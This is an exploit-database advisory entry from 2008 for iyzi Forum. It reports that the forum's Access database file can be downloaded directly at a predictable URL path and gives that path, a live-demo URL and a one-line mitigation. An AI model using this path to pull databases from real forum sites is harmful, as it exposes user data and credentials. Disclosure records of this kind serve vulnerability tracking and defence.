iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability

vendor:

iyzi Forum

by:

Ghost Hacker

7.5

CVSS

HIGH

Database Disclosure Vulnerability

200

CWE

Product Name: iyzi Forum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability

An attacker can access the iyzi Forum database by directly accessing the URL http://xxxx.com/[path]/db/iyziforum.mdb. A live demo of the exploit is available at http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb.

Mitigation:

Ensure that the database is not accessible from the web server.

Source

Exploit-DB raw data:

####################################################################################################
# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability                                  #
# Â© Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Name Script : iyzi Forum                                                                      #
#[~] Download : http://www.iyziforum.com/                                                          #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/db/iyziforum.mdb                                                          #
#[~]Live Demo     &nb sp;                                                                          #
# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb                              #
####################################################################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi                                                      #
# All Members Real-h.com and v4-team.net , All My Friends                                          #
####################################################################################################

# milw0rm.com [2008-12-14]